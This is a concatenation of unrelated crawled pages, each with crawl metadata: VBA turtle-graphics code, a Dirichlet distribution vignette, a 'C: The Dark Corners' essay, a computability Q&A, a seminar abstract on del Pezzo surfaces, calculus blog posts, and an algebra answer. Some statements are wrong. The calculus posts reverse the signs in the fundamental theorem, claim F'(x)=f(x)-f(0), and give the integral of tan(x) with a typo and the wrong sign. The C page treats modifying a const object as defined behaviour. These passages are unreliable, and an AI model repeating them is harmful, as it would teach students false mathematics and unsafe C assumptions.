Here is brute force way one with no advance knowledge of when the program will stop. The program stops when the turtle heading returns to its original position. I also have a second emergency stop at 361 which never comes into play usually. (*footnote – the examples in the group photo that look like folded ribbon were polygons that did not close until 360 lines were drawn but were forced into an early exit with ” If inc > 130 Then Exit Do”) (**footnote – if the turn angle A is an integer, the maximum number of lines to bring the heading back to start is 360.)
```Sub poly_360(len_side As Double, angle As Double)
Dim inc As Integer
Do
turtle1.fd len_side
turtle1.left angle
inc = inc + 1
If inc > 361 Then Exit Do
End Sub
```
Here is a primitive LCM function based on the same method, not intended to be the final version. The angles are added one by one and the result divided by 360 looking for a remainder, breaking out when the remainder is zero. The VBA mod operator works accurately only with integers. I had some overflows on the multiplication. The function seems to work better when all is type Long.
```Function LCM(A As Long, B As Long)
Dim n As Long
Dim result As Long
Dim remainder As Long
n = 0
Do
n = n + 1
result = n * A
remainder = result Mod B
Loop While remainder <> 0
LCM = result
End Function
```
Now the sub to draw the polygon can be taken back to its roots. The loop calculations can be removed, because we will know in advance how many lines will be drawn.
Text information labels are added after the drawing is complete.
```Sub poly_1(angle As Double, n As Integer, len_side As Double)
Dim inc As Integer
For inc = 1 To n
turtle1.fd len_side
turtle1.left angle
Next inc
txt_h "A = " & angle, turtle1.x1, turtle1.y1, 0.125
txt_h "n = " & n, turtle1.x1, turtle1.y1 - 0.25, 0.125
txt_h "R = " & (angle * n / 360), turtle1.x1, turtle1.y1 - 0.5, 0.125
End Sub
```
The sub to call the poly can be fancy or plain. It can draw families of polygons. It can loop and draw a range of turning angles.
This particular one will draw all the polygons with total turns (R) = 29 of angles between 1 and 180.
```Sub turtle_demo_16()
init_turtle
Dim inc As Integer
Dim n As Integer, R As Integer
Dim A As Long, B As Long
B = 360
For inc = 1 To 180
A = inc
n = LCM(A, B) / A
R = LCM(A, 360) / 360
If R = 29 Then
Debug.Print "LCM of " & A; " and " & B; " = " & LCM(A, B)
Debug.Print "A = " & A
Debug.Print "n = " & n
Debug.Print "R = " & R
Debug.Print " "
Call poly_1(CDbl(A), n, 1)
turtle1.x1 = turtle1.x1 + 5
End If
Next inc
End Sub
```
```Sub turtle_demo_16()
init_turtle
Dim inc As Integer
Dim n As Integer, R As Integer
Dim A As Long, B As Long
B = 360
For inc = 160 To 181
A = inc
n = LCM(A, B) / A
R = LCM(A, 360) / 360
Call poly_1(CDbl(A), n, 1)
turtle1.x1 = turtle1.x1 + 1.1
Next inc
End Sub
```
$R<20$ | 2019-02-17 11:30:44 | {"extraction_info": {"found_math": true, "script_math_tex": 0, "script_math_asciimath": 0, "math_annotations": 0, "math_alttext": 0, "mathml": 0, "mathjax_tag": 0, "mathjax_inline_tex": 0, "mathjax_display_tex": 0, "mathjax_asciimath": 0, "img_math": 4, "codecogs_latex": 0, "wp_latex": 0, "mimetex.cgi": 0, "/images/math/codecogs": 0, "mathtex.cgi": 0, "katex": 0, "math-container": 0, "wp-katex-eq": 0, "align": 0, "equation": 0, "x-ck12": 0, "texerror": 0, "math_score": 0.26373040676116943, "perplexity": 550.6742327622667}, "config": {"markdown_headings": true, "markdown_code": true, "boilerplate_config": {"ratio_threshold": 0.18, "absolute_threshold": 10, "end_threshold": 15, "enable": true}, "remove_buttons": true, "remove_image_figures": true, "remove_link_clusters": true, "table_config": {"min_rows": 2, "min_cols": 3, "format": "plain"}, "remove_chinese": true, "remove_edit_buttons": true, "extract_latex": true}, "warc_path": "s3://commoncrawl/crawl-data/CC-MAIN-2019-09/segments/1550247481992.39/warc/CC-MAIN-20190217111746-20190217133746-00430.warc.gz"} |
http://stephens999.github.io/fiveMinuteStats/dirichlet.html | Last updated: 2019-03-31
Checks: 2 0
Knit directory: fiveMinuteStats/analysis/
This reproducible R Markdown analysis was created with workflowr (version 1.2.0). The Report tab describes the reproducibility checks that were applied when the results were created. The Past versions tab lists the development history.
Great! Since the R Markdown file has been committed to the Git repository, you know the exact version of the code that produced these results.
Great! You are using Git for version control. Tracking code development and connecting the code version to the results is critical for reproducibility. The version displayed above was the version of the Git repository at the time these results were generated.
Note that you need to be careful to ensure that all relevant files for the analysis have been committed to Git prior to generating the results (you can use wflow_publish or wflow_git_commit). workflowr only checks the R Markdown file, but you know if there are other scripts or data files that it depends on. Below is the status of the Git repository when the results were generated:
Ignored files:
Ignored: .Rhistory
Ignored: .Rproj.user/
Ignored: analysis/.Rhistory
Ignored: analysis/bernoulli_poisson_process_cache/
Untracked files:
Untracked: _workflowr.yml
Untracked: analysis/CI.Rmd
Untracked: analysis/gibbs_structure.Rmd
Untracked: analysis/libs/
Untracked: analysis/results.Rmd
Untracked: analysis/shiny/tester/
Untracked: docs/MH_intro_files/
Untracked: docs/citations.bib
Untracked: docs/figure/MH_intro.Rmd/
Untracked: docs/hmm_files/
Untracked: docs/libs/
Untracked: docs/shiny/tester/
Note that any generated files, e.g. HTML, png, CSS, etc., are not included in this status report because it is ok for generated content to have uncommitted changes.
These are the previous versions of the R Markdown and HTML files. If you’ve configured a remote Git repository (see ?wflow_git_remote), click on the hyperlinks in the table below to view them.
File Version Author Date Message
html 34bcc51 John Blischak 2017-03-06 Build site.
Rmd 5fbc8b5 John Blischak 2017-03-06 Update workflowr project with wflow_update (version 0.4.0).
html fb0f6e3 stephens999 2017-03-03 Merge pull request #33 from mdavy86/f/review
Rmd 02d2d36 stephens999 2017-02-20 add shiny binomial example
html 02d2d36 stephens999 2017-02-20 add shiny binomial example
# Overview
The purpose of this vignette is to introduce the Dirichlet distribution. You should be familiar with the Beta distribution since the Dirichlet can be thought of as a generalization of the Beta distribution.
If you want more details you could look at Wikipedia.
# The Dirichlet Distribution
You can think of the $$J$$-dimensional Dirichlet distribution as a distribution on probability vectors, $$q=(q_1,\dots,q_J)$$, whose elements are non-negative and sum to 1. It is perhaps the most commonly-used distribution for probability vectors, and plays a central role in Bayesian inference from multinomial data.
The Dirichlet distribution has $$J$$ parameters, $$\alpha_1,\dots,\alpha_J$$ that control the mean and variance of the distribution. If $$q \sim \text{Dirichlet}(\alpha_1,\dots,\alpha_J)$$ then:
• The expectation of $$q_j$$ is $$\alpha_j/(\alpha_1 + \dots + \alpha_J)$$.
• The variance of $$q_j$$ becomes smaller as the sum $$\sum_j \alpha_j$$ increases.
## As a generalization of the Beta distribution
The 2-dimensional Dirichlet distribution is essentially the Beta distribution. Specifically, let $$q=(q_1,q_2)$$. Then $$q \sim Dirichlet(\alpha_1,\alpha_2)$$ implies that $q_1 \sim \text{Beta}(\alpha_1,\alpha_2)$ and $$q_2 = 1-q_1$$.
## Other connections to the Beta distribution
More generally, the marginals of the Dirichlet distribution are also beta distributions.
That is, if $$q \sim \text{Dirichlet}(\alpha_1, \dots,\alpha_J)$$ then $$q_j \sim \text{Beta}(\alpha_j,\sum_{j' \neq j} \alpha_{j'})$$.
# Density
The density of the Dirichlet distribution is most conveniently written as $p(q | \alpha) = \frac{\Gamma(\alpha_1+\dots+\alpha_J)}{\Gamma(\alpha_1)\dots \Gamma(\alpha_J)}\prod_{j=1}^J q_j^{\alpha_j-1} \qquad (q_j \geq 0; \quad \sum_j q_j =1).$ where $$Gamma$$ here denotes the gamma function.
Actually when writing the density this way, a little care needs to be taken to make things formally correct. Specifically, if you perform standard (Lebesgue) integration of this “density” over the $$J$$ dimensional space $$q_1,\dots, q_J$$ it integrates to 0, and not 1 as a density should. This problem is caused by the constraint that the $$q$$s must sum to 1, which means that the Dirichlet distribution is effectively a $$J-1$$-dimensional distribution and not a $$J$$ dimensional distribution.
The simplest resolution to this is to think of the $$J$$ dimensional Dirichlet distribution as a distribution on the $$J-1$$ numbers $$(q_1, \dots, q_{J-1})$$, satisfying $$\sum_{j=1}^{J-1} q_j \leq 1$$, and then define $$q_J := (1-q_1-q_2-\dots - q_{J-1})$$. Then, if we integrate the density $p(q_1,\dots,q_{J-1} | \alpha) = \frac{\Gamma(\alpha_1+\dots+\alpha_J)}{\Gamma(\alpha_1)\dots \Gamma(\alpha_J)} \prod_{j=1}^{J-1} q_j^{\alpha_j-1} (1-q_1-\dots - q_{J-1})^{\alpha_J} \qquad (q_j \geq 0; \quad \sum_{j=1}^{J-1} q_j \leq 1).$ over $$(q_1,\dots,q_{J-1})$$, it integrates to 1 as a density should.
# Examples
This site was created with R Markdown | 2022-08-07 21:50:03 | {"extraction_info": {"found_math": true, "script_math_tex": 0, "script_math_asciimath": 0, "math_annotations": 0, "math_alttext": 0, "mathml": 0, "mathjax_tag": 0, "mathjax_inline_tex": 1, "mathjax_display_tex": 1, "mathjax_asciimath": 1, "img_math": 0, "codecogs_latex": 0, "wp_latex": 0, "mimetex.cgi": 0, "/images/math/codecogs": 0, "mathtex.cgi": 0, "katex": 0, "math-container": 0, "wp-katex-eq": 0, "align": 0, "equation": 0, "x-ck12": 0, "texerror": 0, "math_score": 0.8189806342124939, "perplexity": 1412.5625722876407}, "config": {"markdown_headings": true, "markdown_code": true, "boilerplate_config": {"ratio_threshold": 0.18, "absolute_threshold": 10, "end_threshold": 15, "enable": true}, "remove_buttons": true, "remove_image_figures": true, "remove_link_clusters": true, "table_config": {"min_rows": 2, "min_cols": 3, "format": "plain"}, "remove_chinese": true, "remove_edit_buttons": true, "extract_latex": true}, "warc_path": "s3://commoncrawl/crawl-data/CC-MAIN-2022-33/segments/1659882570730.59/warc/CC-MAIN-20220807211157-20220808001157-00039.warc.gz"} |
https://ambrevar.xyz/c/index.html | # C: The Dark Corners
C was designed with simplicity in mind. Despite this, C has a lot of dark corners that are not necessarily well known. Here follows an incomplete collection of them.
For historical reasons, we also include some C++ intricacies that may be source of confusion when writing C programs.
## Constancy
### Constant definition
The const key word always applies to the identifier to the left, when any, or to the right otherwise.
Both following lines declare a pointer over a constant integer.
const int * pi;
int const * pi;
The following, however, declares a constant pointer over an integer.
int * const pi;
Pay special attention when declaring pointers to arrays because of the operator precedence. Here we have an array of 12 pointers to constant integers.
const int *pi[12];
The next one is a pointer to an array of 12 constant integers.
const int (*pi)[12];
It is always possible to make something constant, but the opposite is not true.
In C++, it is possible to add the const key word next to a method prototype to specify that it will not modify the attributes.
### Constant pointers
The following is forbidden:
char *pc;
const char **ppc;
ppc = &pc; // Forbidden!
This would break the constancy rule, since it would be possible to change **ppc value through *pc.
Suppose it would not be forbidden:
const char c = 'a'; // Constant variable.
char *pc; // Pointer through which we will change c.
const char **ppc = &pc; // Forbidden, but assume it is not.
*ppc = &c; // Legal.
*pc = 'b'; // Change c.
So ppc goes through pc to c. Since pc is not a pointer to a constant, we can change the value, thus ppc constancy is broken.
### C/C++ difference for const
In C, the following
const int a = 10;
int *p = &a;
*p = 30;
printf("&a: %u, a: %d\n", &a, a);
printf("&p: %u, p: %d\n", p, *p);
return 0;
outputs as expected
&a: 1021510500, a: 30
&p: 1021510500, p: 30
But in C++, the previous code won’t be allowed since the const keyword is more restrictive. There is a workaround though:
const int a = 10;
int *p = (int*)(&a);
*p = 30;
printf("&a: %u, a: %d\n", &a, a);
printf("&p: %u, p: %d\n", p, *p);
but the output will be:
&a: 1021510500, a: 10
&p: 1021510500, p: 30
Yes, that is the same address and two different values!
This is because C++ handles const as an immediate value, not a variable. It behaves similarly to #define. The address of a const, albeit grammatically defined, is rather meaningless.
### Constants as static array initializers
Semantically speaking, the const keyword refers to immutable variables and not constant variables, which is an interesting oxymoron.
As such, const variables should not be used to initialize static arrays of some size, since the standard requires a semantic constant here, i.e. an integer or a preprocessor expression that expands to an integer.
int array1[17];
const unsigned int sz = sizeof array1;
int array2[sizeof array1]; // OK
int array3[sz]; // Wrong
In practice, most compilers accept const variables in that case.
## Function argument evaluation order
From The C Programming Language:
The order in which function arguments are evaluated is unspecified, so the statement printf(“%d %d\n”, ++n, power(2, n)); can produce different results with different compilers, depending on whether n is incremented before power is called.
Thus it is good practice to avoid expressions in function calls.
## Arrays
Arrays are not pointers! There is a small number of cases when they behave differently. The following test is true:
array[0] == *array
From the C standard:
Except when it is the operand of the sizeof operator, the _Alignof operator, or the unary & operator, or is a string literal used to initialize an array, an expression that has type “array of type” is converted to an expression with type “pointer to type” that points to the initial element of the array object and is not an lvalue. If the array object has register storage class, the behavior is undefined.
### Using sizeof
The sizeof operator is dynamic and follows its own set of rules as described by the standard. When the argument is an array, it will return the total number of bytes.
long array[3];
long *p = array;
printf("%zu\n", sizeof(array));
printf("%zu\n", sizeof(p));
On machines where long is 8 bytes and pointers are 4 bytes, this will output:
24
4
Arrays are automatically converted to pointers in function arguments. Thus the behavior of sizeof is special only within the scope of an array declaration.
void foo(int array[]) {
printf("foo: sizeof array == %zu\n", sizeof array);
}
void bar(int array[12]) {
printf("bar: sizeof array == %zu\n", sizeof array);
}
int main() {
int array[10];
printf("main: sizeof array == %zu\n", sizeof array);
foo(array);
bar(array);
return 0;
}
For multidimensional arrays, only the outermost dimension is converted to a pointers. For instance, int array[M][N] will be cast to int (*)[N]. The following will output the size of a pointer.
void foo(int *array[3]) {
printf("foo: sizeof array == %zu\n", sizeof array);
}
int main() {
int arr[2][3] = {{10, 20, 30}, {40, 50, 60}};
foo(arr);
return 0;
}
### Addressing arrays
Arrays have a type signature that differs from pointers. The signature of a pointer to an n-array of T is T (*)[n].
long array[3];
long *p;
long **pp;
long (*ap)[3];
p = &array; // Wrong
pp = &array; // Wrong
ap = &array; // OK
Note that the warning about type comes from the dereferences (&), since the following code does not prompt any warning:
long array[3];
long *p;
long (*ap)[3];
p = array; // OK this time
ap = &array; // OK
Conversely, a pointer cannot be assigned to an array:
long array[3];
long *p;
array = p; // Wrong
### Arrays as strings
Arrays can only be initialized with semantic constants.
char *p = "hello";
char t0[] = "world";
char t1[] = {'f', 'o', 'o'};
char t2[] = p; // Error.
char t3[] = (char*) "foo"; // Error.
There is another major difference in the initialization of pointers against arrays. The pointer will only set its value to the address of hello stored in the static memory segment of the program, whereas the array will copy world from this same segment to its allocated memory. The array can be modified afterwards, unlike the underlying value of the pointer.
## Implicit cast
Numbers are automatically upcast in function calls. Compare
unsigned char a = 255;
a++;
printf("%d\n", a);
and
unsigned char a = 255;
printf("%d\n", a+1);
There is no loss of information during an upcast, except for the char type. C does not specify whether a char should be signed. Thus signed or unsigned should be used to ensure portability.
From The C Programming Language, section 2.7:
Conversion rules are more complicated when unsigned operands are involved. The problem is that comparisons between signed and unsigned values are machine-dependent, because they depend on the sizes of the various integer types. For example, suppose that int is 16 bits and long is 32 bits. Then -1L < 1U, because 1U, which is an int, is promoted to a signed long. But -1L > 1UL, because -1L is promoted to unsigned long and thus appears to be a large positive number.
See appendix A6 in the book for more implicit conversion rules.
## Bit shifting
Be wary of the difference between a logical shift and an arithmetic shift. See this Wikipedia article for more details. Note that it only matters for right shifting.
The C behaviour is architecture-dependent for signed numbers.
## Modulo operation
In C99, the result of a modulo operation has the sign of the dividend:
printf("-5 % 2 = %d\n", -5 % 2);
printf("5 % -2 = %d\n", 5 % -2);
To test whether an integer is odd, you must compare to 0, not 1. Otherwise, the result will be incorrect when the dividend is negative.
if (n % 2 == 1) // WRONG!
if (n % 2 != 0) // Correct.
## Operator precedence
The choice for operator precedence in C can be counter-intuitive at times. The expression a & b == 7 is parsed as a & (b == 7).
See this Wikipedia article for more details.
## File reading
When a text file is open in text-mode, (e.g. using the "r" option), POSIX specifies that the "b" option is ignored. Some non-POSIX operating systems, however, may try to be too smart. They will expect a “standard” end-of-line, such as \r\n. Which will obviously produce unexpected results on files with \n line breaks. The "b" option does not harm and helps for portability.
## Globals
Pre-declarations can appear any number of times in C. They can appear only once in C++, or the compiler will complain about double definitions of globals:
#include <stdio.h>
int global;
int global;
int global = 3;
void change() {
global = 17;
}
int main() {
printf("%d\n", global);
change();
printf("%d\n", global);
return 0;
}
In C, it will display the following:
3
17
## Pointer arithmetic
It is not safe to assume that pointer arithmetic results in any integral type. Some architectures may have memory addresses indexed over 64-bit values, while using data over 32 bits. This behavior can be controlled from stdlib.h. For example, a pointer difference is stored as a type ptrdiff_t.
## Size of void
With GCC, sizeof(void) == 1 is true. This is non standard, but the behaviour is not clearly specified either. Using -pedantic will output a warning.
## Alignment
Do not expect the memory layout in structures to be as the code describes it: the compiler is free to pad some memory for optimization purposes.
This proves dangerous when serializing data. Use the offsetof macro to get the real offset of each structure member.
struct {char a; int b;} foo;
struct {char a; char b;} bar;
printf("sizeof foo == %zu\n", sizeof foo);
printf("&foo == %p\n", &foo);
printf("&foo.a == %p\n", &foo.a);
printf("&foo.b == %p\n", &foo.b);
printf("sizeof bar == %zu\n", sizeof bar);
printf("&bar == %p\n", &bar);
printf("&bar.a == %p\n", &bar.a);
printf("&bar.b == %p\n", &bar.b);
## Precompiled headers
Compiling a header file may yield an unexpected result: some compilers such as GCC will recognize the extension and act accordingly. In that case, building a header will not result in an executable, but in a precompiled header, that is, an optimization for large headers.
If you want to force or prevent the build of precompiled headers, GCC allows for specifying the input language:
# The .xml file will be seen as a C header file.
gcc -x c-header myfile.xml
# The .h file will be compiled into an executable.
gcc -x c myfile.h
## Final note
The numerous dark corners of C require some getting used to. It is helpful and good practice to make heavy use of your compiler’s warning flags, together with some fine “lint” tools.
## References
Comments
Date: 2016-01-29 (Last update: 2018-11-08)
Made with Emacs 27.0.50 (Org mode 9.1.9) | 2019-02-18 05:55:25 | {"extraction_info": {"found_math": true, "script_math_tex": 0, "script_math_asciimath": 0, "math_annotations": 0, "math_alttext": 0, "mathml": 0, "mathjax_tag": 0, "mathjax_inline_tex": 0, "mathjax_display_tex": 0, "mathjax_asciimath": 1, "img_math": 0, "codecogs_latex": 0, "wp_latex": 0, "mimetex.cgi": 0, "/images/math/codecogs": 0, "mathtex.cgi": 0, "katex": 0, "math-container": 0, "wp-katex-eq": 0, "align": 0, "equation": 0, "x-ck12": 0, "texerror": 0, "math_score": 0.2453889399766922, "perplexity": 5831.294535309744}, "config": {"markdown_headings": true, "markdown_code": true, "boilerplate_config": {"ratio_threshold": 0.18, "absolute_threshold": 20, "end_threshold": 15, "enable": false}, "remove_buttons": true, "remove_image_figures": true, "remove_link_clusters": true, "table_config": {"min_rows": 2, "min_cols": 3, "format": "plain"}, "remove_chinese": true, "remove_edit_buttons": true, "extract_latex": true}, "warc_path": "s3://commoncrawl/crawl-data/CC-MAIN-2019-09/segments/1550247484689.3/warc/CC-MAIN-20190218053920-20190218075920-00169.warc.gz"} |
https://cs.stackexchange.com/questions/110750/can-such-a-turing-recognizable-language-exist | # Can such a Turing-recognizable language exist?
Suppose $$\Sigma = \{a,b\}$$. Is the following claim correct?
There exists a Turing-recognizable language $$L \subseteq \Sigma^*$$ such as its complement is not Turing-recognizable, and for all $$n \in \mathbb{N}$$ it contains exactly $$n$$ strings of length $$n$$.
I'm kind of lost here. Any help would be appreciated.
• Have you tried proving there is no such language? Jun 16, 2019 at 13:34
If $$L$$ is a recognizable language that contains $$f(n)$$ strings of length $$n$$, where $$f$$ is computable, then $$L$$ is in fact computable. Given a string $$x$$ of length $$n$$, calculate $$f(n)$$, and then run a recognizer for $$L$$ on all strings of length $$n$$. Eventually you will find all $$f(n)$$ strings recognized by $$L$$. If $$x$$ is one of them, accept, and otherwise, reject. | 2022-07-03 11:04:12 | {"extraction_info": {"found_math": true, "script_math_tex": 0, "script_math_asciimath": 0, "math_annotations": 0, "math_alttext": 0, "mathml": 0, "mathjax_tag": 0, "mathjax_inline_tex": 0, "mathjax_display_tex": 0, "mathjax_asciimath": 0, "img_math": 0, "codecogs_latex": 0, "wp_latex": 0, "mimetex.cgi": 0, "/images/math/codecogs": 0, "mathtex.cgi": 0, "katex": 0, "math-container": 18, "wp-katex-eq": 0, "align": 0, "equation": 0, "x-ck12": 0, "texerror": 0, "math_score": 0.6793118119239807, "perplexity": 280.9563912875029}, "config": {"markdown_headings": true, "markdown_code": true, "boilerplate_config": {"ratio_threshold": 0.18, "absolute_threshold": 10, "end_threshold": 15, "enable": true}, "remove_buttons": true, "remove_image_figures": true, "remove_link_clusters": true, "table_config": {"min_rows": 2, "min_cols": 3, "format": "plain"}, "remove_chinese": true, "remove_edit_buttons": true, "extract_latex": true}, "warc_path": "s3://commoncrawl/crawl-data/CC-MAIN-2022-27/segments/1656104240553.67/warc/CC-MAIN-20220703104037-20220703134037-00651.warc.gz"} |
https://researchseminars.org/talk/agstanford/5/ | # Density of rational points on a family of del Pezzo surface of degree 1
### Julie Desjardins (Toronto)
08-May-2020, 17:45-18:45 (10 months ago)
Abstract: Let $k$ be a number field and $X$ an algebraic variety over $k$. We want to study the set of $k$-rational points $X(k)$. For example, is $X(k)$ empty? If not, is it dense with respect to the Zariski topology? Del Pezzo surfaces are classified by their degrees $d$ (an integer between 1 and 9). Manin and various authors proved that for all del Pezzo surfaces of degree $>1$ is dense provided that the surface has a $k$-rational point (that lies outside a specific subset of the surface for $d=2$). For $d=1$, the del Pezzo surface always has a rational point. However, we don't know it the set of rational points is Zariski-dense. In this talk, I present a result that is joint with Rosa Winter in which we prove the density of rational points for a specific family of del Pezzo surfaces of degree 1 over $k$.
The discussion for Julie Desjardins’s talk is taking place not in zoom-chat, but at tinyurl.com/stagMay08a (and will be deleted after 3-7 days).
algebraic geometry
Audience: researchers in the topic | 2021-02-25 13:00:35 | {"extraction_info": {"found_math": true, "script_math_tex": 0, "script_math_asciimath": 0, "math_annotations": 0, "math_alttext": 0, "mathml": 0, "mathjax_tag": 0, "mathjax_inline_tex": 1, "mathjax_display_tex": 0, "mathjax_asciimath": 0, "img_math": 0, "codecogs_latex": 0, "wp_latex": 0, "mimetex.cgi": 0, "/images/math/codecogs": 0, "mathtex.cgi": 0, "katex": 0, "math-container": 0, "wp-katex-eq": 0, "align": 0, "equation": 0, "x-ck12": 0, "texerror": 0, "math_score": 0.859734058380127, "perplexity": 221.68323992184216}, "config": {"markdown_headings": true, "markdown_code": true, "boilerplate_config": {"ratio_threshold": 0.18, "absolute_threshold": 10, "end_threshold": 15, "enable": true}, "remove_buttons": true, "remove_image_figures": true, "remove_link_clusters": true, "table_config": {"min_rows": 2, "min_cols": 3, "format": "plain"}, "remove_chinese": true, "remove_edit_buttons": true, "extract_latex": true}, "warc_path": "s3://commoncrawl/crawl-data/CC-MAIN-2021-10/segments/1614178351134.11/warc/CC-MAIN-20210225124124-20210225154124-00227.warc.gz"} |
https://trevorpythag.wordpress.com/tag/integration/ | Archive
Posts Tagged ‘integration’
Fundamental Theorem of Calculus
This theorem forms much of the basis of calculus and the uses of differentiation and integration. It basically states that differentiation and integration are opposites so if you differentiate and integral you’ll get the function you started with. This can be stated as follows:
if $F(x) = \int_a(x)^b(x) \! f(t) \, dx$ then $\frac{dF}{dx} = f(a(x))\frac{da}{dx} - f(b(x))\frac{db}{dx}$
or in the more simple case
if $F(x) = \int_0^x \! f(t) \, dx$ then $\frac{dF}{dx} = f(x)- f(0)$
It is this idea that allows us to know, for example,
$\int \! \frac{1}{1+x^2} \, dx = tan^-1(x) + c$
from the knowledge that
\$frac{d(tan^-1(x))}{dx} = \frac{1}{1+x^2}$
This makes much of integration easier as it is often much easier to work out the derivative a function than work out the integral of one so we can look for functions which when differentiated give us the function that we want to integrate and then know that the integral is that function plus a constant.
Categories: calculus, maths
Integrating Fractions – using the natrual logarithm – Example tan(x)
From result found be differentiating the natural logarithm,
$\frac{d}{dx} (ln(f(x))) = \frac{f'(x)}{f(x)}$
for some function f(x),
and the fundamental theorem of calculus we cay say that
$\int \! \frac{f'(x)}{f(x)} \, dx = ln|f(x)| + c$ where c is the integration constant
Simple Example
The most basic example of this is the integration of 1/x,
$\int \! \frac{1}{x} \, dx = ln|x| + c$
More complex example: Integration of tan(x)
A slightly more complicated example of this is the integration of tan(x). To do this we must remember that $tan(x) = \frac{sin(x)}{cos(x)}$ and notice that $\frac{d}{dx}(cos(x)) = -sin(x)$. This means that -tan(x) is of the form $\frac{f'(x)}{f(x)}$ as required. Using this we can get
$\int \! tan(x) \, dx = \int \! \frac{sin(x)}{cos(x)} \, dx = lan|cos(x)| + c$
Trick for using this identity
Sometimes we get integrals that are almost in this form but not exactly, eg) $\int \! \frac{x}{5 + x^2} \, dx$, however to solve these we can often factorise a constant so that it is in the required form. In this example we can take out a 2 so we get $\frac{1}{2} \int \! \frac{2x}{ 5 + x^2} \, dx = ln|5 + x^2| + c$
Categories: calculus | 2018-01-20 16:58:29 | {"extraction_info": {"found_math": true, "script_math_tex": 0, "script_math_asciimath": 0, "math_annotations": 0, "math_alttext": 0, "mathml": 0, "mathjax_tag": 0, "mathjax_inline_tex": 0, "mathjax_display_tex": 0, "mathjax_asciimath": 0, "img_math": 15, "codecogs_latex": 0, "wp_latex": 0, "mimetex.cgi": 0, "/images/math/codecogs": 0, "mathtex.cgi": 0, "katex": 0, "math-container": 0, "wp-katex-eq": 0, "align": 0, "equation": 0, "x-ck12": 0, "texerror": 0, "math_score": 0.9967487454414368, "perplexity": 1890.8096562212684}, "config": {"markdown_headings": false, "markdown_code": true, "boilerplate_config": {"ratio_threshold": 0.18, "absolute_threshold": 10, "end_threshold": 15, "enable": true}, "remove_buttons": true, "remove_image_figures": true, "remove_link_clusters": true, "table_config": {"min_rows": 2, "min_cols": 3, "format": "plain"}, "remove_chinese": true, "remove_edit_buttons": true, "extract_latex": true}, "warc_path": "s3://commoncrawl/crawl-data/CC-MAIN-2018-05/segments/1516084889677.76/warc/CC-MAIN-20180120162254-20180120182254-00156.warc.gz"} |
http://math.stackexchange.com/questions/169273/antiderivative-help | # Antiderivative Help
I am trying to find $f(x)$ if I know that $$f''(x) = -2+12x-12x^2, \quad \; f(0)=4,\ f'(0)=12$$
First I found the first derivative $$f'(x)= -2x+6x^2-4x^3+C$$
and then I found the function, which is: $$f(x)=-x^2+2x^3-x^4+Cx+D$$
Now I am lost as to what to do with those values they gave me $f(0)=4,\ f'(0)=12$
Where do i proceed from here?
-
Plug in 0. And I assume the first $-2x$ is supposed to be $-2$? – Mike Jul 11 '12 at 1:05
Nope it should be $-2x$ since im finding the antiderivative right? – soniccool Jul 11 '12 at 1:07
So i should plug in 0 for the second and 0 for the first and get those answers back? – soniccool Jul 11 '12 at 1:07
first, in the $f'$ equation, plug in the point $(0,12)$ and solve for the constant $C$. Then do the same for $D$ in the $f(x)$ equation and you're done! – Robert Mastragostino Jul 11 '12 at 1:09
After finding the value of $f'(x)$ with the unknown constant $C$, use the fact that $f'(0)=12$ to determine the value of $C$. That is, since $$f'(x) = -2x + 6x^2 - 4x^3 + C\quad\text{and}\quad f'(0)=12$$ that means that $$12 = f'(0) = -2(0) + 6(0)^2 - 4(0)^3 + C.$$ This should tell you the value of $C$.
Then find $f(x)$, which will give you another unknown constant $D$. Use the fact that $f(0)=4$ to figure out the value of $D$. | 2015-10-13 13:53:05 | {"extraction_info": {"found_math": true, "script_math_tex": 0, "script_math_asciimath": 0, "math_annotations": 0, "math_alttext": 0, "mathml": 0, "mathjax_tag": 0, "mathjax_inline_tex": 1, "mathjax_display_tex": 1, "mathjax_asciimath": 0, "img_math": 0, "codecogs_latex": 0, "wp_latex": 0, "mimetex.cgi": 0, "/images/math/codecogs": 0, "mathtex.cgi": 0, "katex": 0, "math-container": 0, "wp-katex-eq": 0, "align": 0, "equation": 0, "x-ck12": 0, "texerror": 0, "math_score": 0.9484612345695496, "perplexity": 125.11309127914396}, "config": {"markdown_headings": true, "markdown_code": true, "boilerplate_config": {"ratio_threshold": 0.18, "absolute_threshold": 10, "end_threshold": 15, "enable": true}, "remove_buttons": true, "remove_image_figures": true, "remove_link_clusters": true, "table_config": {"min_rows": 2, "min_cols": 3, "format": "plain"}, "remove_chinese": true, "remove_edit_buttons": true, "extract_latex": true}, "warc_path": "s3://commoncrawl/crawl-data/CC-MAIN-2015-40/segments/1443738006925.85/warc/CC-MAIN-20151001222006-00012-ip-10-137-6-227.ec2.internal.warc.gz"} |
https://www.gradesaver.com/textbooks/math/algebra/elementary-and-intermediate-algebra-concepts-and-applications-6th-edition/chapter-4-polynomials-4-3-polynomials-4-3-exercise-set-page-251/11 | ## Elementary and Intermediate Algebra: Concepts & Applications (6th Edition)
$\color{red}{\text{This expression is NOT a polynomial}}$.
Remember that a term is considered as a monomial ONLY IF it is a PRODUCT of constants and/or variables. In this item, the terms are $x^2$, $x$, $1$, $x^3$ and $-7$; however, when combined, they produce a QUOTIENT of constants and/or variables. Therefore, $\color{red}{\text{this expression is NOT a polynomial}}$. | 2018-06-19 13:10:38 | {"extraction_info": {"found_math": true, "script_math_tex": 0, "script_math_asciimath": 0, "math_annotations": 0, "math_alttext": 0, "mathml": 0, "mathjax_tag": 0, "mathjax_inline_tex": 1, "mathjax_display_tex": 0, "mathjax_asciimath": 0, "img_math": 0, "codecogs_latex": 0, "wp_latex": 0, "mimetex.cgi": 0, "/images/math/codecogs": 0, "mathtex.cgi": 0, "katex": 0, "math-container": 0, "wp-katex-eq": 0, "align": 0, "equation": 0, "x-ck12": 0, "texerror": 0, "math_score": 0.9255894422531128, "perplexity": 468.4033975729473}, "config": {"markdown_headings": true, "markdown_code": false, "boilerplate_config": {"ratio_threshold": 0.18, "absolute_threshold": 10, "end_threshold": 15, "enable": true}, "remove_buttons": true, "remove_image_figures": true, "remove_link_clusters": true, "table_config": {"min_rows": 2, "min_cols": 3, "format": "plain"}, "remove_chinese": true, "remove_edit_buttons": true, "extract_latex": true}, "warc_path": "s3://commoncrawl/crawl-data/CC-MAIN-2018-26/segments/1529267862929.10/warc/CC-MAIN-20180619115101-20180619135101-00103.warc.gz"} |
